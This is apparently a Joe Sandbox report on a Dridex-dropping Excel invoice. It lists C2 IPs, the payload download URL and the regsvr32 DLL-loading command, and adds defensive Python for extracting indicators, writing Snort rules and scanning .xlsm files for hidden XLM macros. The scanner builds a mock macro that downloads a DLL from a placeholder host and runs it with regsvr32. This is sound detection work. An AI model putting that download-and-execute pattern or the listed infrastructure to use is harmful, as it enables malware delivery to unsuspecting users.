Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49374
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49375
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49378
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49379
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49382
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49383
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49386
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49387
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49390
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49391
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49394
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49395
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49398
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49399
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 80.86.91.27:3308
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.100.228.233:3389
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 46.105.131.65:1512
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 12 Jan 2021 00:43:52 GMTserver: Apachelast-modified: Mon, 11 Jan 2021 16:51:11 GMTaccept-ranges: bytescontent-length: 318976content-type: application/x-rar-compressed
Source: Joe Sandbox ViewIP Address: 5.100.228.233
Source: Joe Sandbox ViewIP Address: 80.86.91.27
Source: Joe Sandbox ViewIP Address: 46.105.131.65
Source: Joe Sandbox ViewIP Address: 77.220.64.37
Source: Joe Sandbox ViewASN Name: SENTIANL
Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE
Source: Joe Sandbox ViewASN Name: OVHFR
Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: global trafficHTTP traffic detected: GET /d0l359.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: truxiellogroup.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1182D45F.emf
Source: regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comvw equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: truxiellogroup.com
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241078237.0000000000236000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: DWWIN.EXE, 00000007.00000003.2239993090.00000000001B1000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245060695.0000000003835000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2381929162.0000000001CD0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382046788.00000000008F0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241857829.00000000022E0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | String found in binary or memory: https://46.105.131.65/f
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | String found in binary or memory: https://46.105.131.65/t
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2385480217.00000000031AA000.00000004.00000001.sdmp | String found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | String found in binary or memory: https://46.105.131.65:1512/yB
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | String found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | String found in binary or memory: https://5.100.228.233/qM
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | String found in binary or memory: https://5.100.228.233:3389/YB
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | String found in binary or memory: https://5.100.228.233:3389/aB
Source: regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmp | String found in binary or memory: https://77.220.64.37/
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | String found in binary or memory: https://80.86.91.27/
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmp | String found in binary or memory: https://80.86.91.27/P
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | String found in binary or memory: https://80.86.91.27:3308/AB
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp | String found in binary or memory: https://80.86.91.27:3308/IB
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 443, seen in both directions (local port -> 443 and 443 -> local port) for each of these 58 local ports: 49166, 49171, 49175, 49179, 49183, 49187, 49191, 49195, 49199, 49203, 49207, 49211, 49215, 49219, 49223, 49229, 49233, 49237, 49241, 49245, 49249, 49253, 49257, 49261, 49265, 49269, 49273, 49277, 49281, 49285, 49289, 49293, 49297, 49301, 49305, 49309, 49313, 49317, 49321, 49325, 49329, 49333, 49337, 49341, 49345, 49349, 49353, 49357, 49362, 49366, 49370, 49374, 49378, 49382, 49386, 49390, 49394, 49398
Source: unknown | HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:<local port> version: TLS 1.2, one session for each of these 58 local ports: 49166, 49171, 49175, 49179, 49183, 49187, 49191, 49195, 49199, 49203, 49207, 49211, 49215, 49219, 49223, 49229, 49233, 49237, 49241, 49245, 49249, 49253, 49257, 49261, 49265, 49269, 49273, 49277, 49281, 49285, 49289, 49293, 49297, 49301, 49305, 49309, 49313, 49317, 49321, 49325, 49329, 49333, 49337, 49341, 49345, 49349, 49353, 49357, 49362, 49366, 49370, 49374, 49378, 49382, 49386, 49390, 49394, 49398
Source: C:\Windows\System32\DWWIN.EXE | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
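The memory strings above carry the C2 set (46.105.131.65, 5.100.228.233, 77.220.64.37, 80.86.91.27) and show that the implant expects HTTPS on 1512, 3389 and 3308 as well as on 443, while the capture shows dozens of short TLS 1.2 sessions from ascending client ports to 77.220.64.37:443. The helper below is an added example, not part of the sandbox report: it pulls those endpoints out of lines in the report's own format, flags the non-443 TLS ports (3389 is normally RDP, so a port-based allow-list would not catch it) and renders simple Snort/Suricata block rules. The input lines are copied from this report with the Source column removed; the SID numbering in the rules is an assumption.

```python
"""Extract C2 endpoints from sandbox memory-string and TLS lines and flag HTTPS on
non-standard ports. Added example for this report; REPORT_LINES are copied from the
report (Source column dropped), the parsing and the rule rendering are this example's."""
import re
from collections import defaultdict

# https://IP[:port]/... as it appears in the implant's memory strings
URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?/")
# the sandbox's wire-level TLS line: server:port -> client:port version: TLS x.y
TLS_RE = re.compile(
    r"HTTPS traffic detected: (\d{1,3}(?:\.\d{1,3}){3}):(\d+) -> (\S+?):(\d+) version: (TLS [\d.]+)")

REPORT_LINES = [  # copied from this report; the windowsupdate line is a benign control
    "String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
    "String found in binary or memory: https://46.105.131.65/f",
    "String found in binary or memory: https://46.105.131.65:1512/",
    "String found in binary or memory: https://5.100.228.233/",
    "String found in binary or memory: https://5.100.228.233:3389/YB",
    "String found in binary or memory: https://77.220.64.37/",
    "String found in binary or memory: https://80.86.91.27/P",
    "String found in binary or memory: https://80.86.91.27:3308/AB",
    "HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2",
    "HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2",
    "HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2",
]


def extract_endpoints(lines):
    """Map server IP -> set of ports, merging URLs found in memory with sessions seen on the wire."""
    endpoints = defaultdict(set)
    for line in lines:
        for ip, port in URL_RE.findall(line):
            # a bare https://IP/ implies 443; an explicit :port is the implant's own choice
            endpoints[ip].add(int(port) if port else 443)
        m = TLS_RE.search(line)
        if m:
            endpoints[m.group(1)].add(int(m.group(2)))
    return dict(endpoints)


def nonstandard_tls_ports(endpoints):
    """(ip, port) pairs where TLS is expected on something other than 443."""
    return sorted((ip, p) for ip, ports in endpoints.items() for p in ports if p != 443)


def tls_sessions_to(lines, server_ip):
    """Count TLS sessions to one server; many short sessions from ascending client
    ports to a single IP is the beaconing shape this report shows."""
    return sum(1 for line in lines if (m := TLS_RE.search(line)) and m.group(1) == server_ip)


def snort_rules(endpoints, base_sid=1000001):
    """One alert rule per non-443 endpoint (SID range is an assumption, adjust locally)."""
    rules = []
    for i, (ip, port) in enumerate(nonstandard_tls_ports(endpoints)):
        rules.append(f'alert tcp $HOME_NET any -> {ip} {port} '
                     f'(msg:"Sandbox-derived C2 endpoint {ip}:{port}"; flow:to_server; '
                     f'sid:{base_sid + i}; rev:1;)')
    return rules


if __name__ == "__main__":
    ep = extract_endpoints(REPORT_LINES)
    print(ep)
    print(nonstandard_tls_ports(ep))
    print(tls_sessions_to(REPORT_LINES, "77.220.64.37"), "TLS sessions to 77.220.64.37")
    print("\n".join(snort_rules(ep)))
```

Feed it the full indicator list rather than the excerpt and the session count for 77.220.64.37 becomes the 58 shown in the HTTPS block; the IP-level rules are a stopgap, since the operators will rotate addresses while the port mix (443 plus 1512/3389/3308) tends to persist longer.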

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Found Excel 4.0 Macro with suspicious formulas
Source: INV2680371456-20210111889374.xlsm | Initial sample: CALL
Source: INV2680371456-20210111889374.xlsm | Initial sample: CALL
Source: INV2680371456-20210111889374.xlsm | Initial sample: CALL
Source: INV2680371456-20210111889374.xlsm | Initial sample: CALL
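The CALL indicators above come from Excel 4.0 (XLM) macro sheets. In an .xlsm container those sheets are separate parts under xl/macrosheets/, and they are normally marked veryHidden in xl/workbook.xml so that they never appear in the tab bar; the VBA Application.Run("moreP_ab") call above is the usual bridge from the VBA stub into the XLM code. The scanner below is an added example, not part of the sandbox report or the sample: it finds those parts and the CALL/EXEC/REGISTER/RUN formulas in them with the standard library only (no Excel, no oletools). The workbook it builds is constructed to mimic the pattern (download a DLL, hand it to regsvr32) and its URL, path and sheet names are placeholders, not values from the sample.

```python
"""Static triage of an .xlsm for Excel 4.0 (XLM) macro sheets, hidden sheets and
CALL/EXEC-style formulas, standard library only.
Added example for this report; the workbook built by build_sample_xlsm() is
constructed to mimic the indicators and is not the analysed sample."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
# XLM functions that reach outside the workbook: CALL/REGISTER bind Win32 exports
# (e.g. urlmon!URLDownloadToFileA), EXEC runs a command line, RUN jumps to a macro.
# Assumed watchlist for this example; extend it as needed.
SUSPICIOUS = re.compile(r"\b(CALL|EXEC|REGISTER|RUN|FORMULA\.FILL)\s*\(", re.I)


def scan_xlsm(data: bytes) -> dict:
    """Return macro-sheet parts, non-visible sheets and suspicious formulas in the container."""
    findings = {"macrosheets": [], "hidden_sheets": [], "suspicious": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # Any part under xl/macrosheets/ is an Excel 4.0 macro sheet, whatever it is named.
        findings["macrosheets"] = sorted(n for n in names if n.startswith("xl/macrosheets/"))
        if "xl/workbook.xml" in names:
            wb = ET.fromstring(zf.read("xl/workbook.xml"))
            for sheet in wb.iterfind("m:sheets/m:sheet", NS):
                state = sheet.get("state", "visible")
                # "hidden" can be unhidden from the UI; "veryHidden" only via VBA or the XML
                if state != "visible":
                    findings["hidden_sheets"].append((sheet.get("name"), state))
        for part in findings["macrosheets"]:
            root = ET.fromstring(zf.read(part))
            for cell in root.iterfind(".//m:c", NS):
                formula = cell.find("m:f", NS)
                if formula is not None and formula.text and SUSPICIOUS.search(formula.text):
                    findings["suspicious"].append((part, cell.get("r"), formula.text))
    return findings


def build_sample_xlsm() -> bytes:
    """Constructed workbook: a visible data sheet plus a veryHidden XLM sheet whose
    formulas download a DLL and hand it to regsvr32 (placeholder URL and paths)."""
    workbook = (
        '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
        '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/></sheets></workbook>'
    )
    macrosheet = (
        '<macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData>'
        '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCBB",0,'
        '"https://203.0.113.5/x","C:\\Users\\Public\\x.dll",0,0)</f></c></row>'
        '<row r="2"><c r="A2"><f>EXEC("regsvr32 -s C:\\Users\\Public\\x.dll.")</f></c></row>'
        '<row r="3"><c r="A3"><f>HALT()</f></c></row></sheetData></macrosheet>'
    )
    worksheet = ('<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
                 '<sheetData/></worksheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/worksheets/sheet1.xml", worksheet)
        zf.writestr("xl/macrosheets/sheet1.xml", macrosheet)
    return buf.getvalue()


if __name__ == "__main__":
    for key, items in scan_xlsm(build_sample_xlsm()).items():
        print(key, items)
```

Point scan_xlsm() at the bytes of a real file to triage it; a non-empty macrosheets list together with a veryHidden sheet is already enough to quarantine an invoice-themed attachment, and the formula text tells you what the payload stage does. This covers only the OOXML container; legacy .xls files keep XLM in the BIFF stream and need a BIFF parser instead.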
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\aymakjne.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0017B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_0017BA14 NtSetInformationProcess,
Source: INV2680371456-20210111889374.xlsm | OLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentation | OLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: INV2680371456-20210111889374.xlsm | OLE indicator, VBA macros: true
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
Source: d0l359[1].rar.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: d0l359[1].rar.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: d0l359[1].rar.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: d0l359[1].rar.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.expl.evad.winXLSM@9/21@1/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$INV2680371456-20210111889374.xlsm
Source: C:\Windows\System32\DWWIN.EXE | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2292
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD0F5.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\DWWIN.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\DWWIN.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: INV2680371456-20210111889374.xlsm | Virustotal: Detection: 46%
Source: INV2680371456-20210111889374.xlsm | ReversingLabs: Detection: 32%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
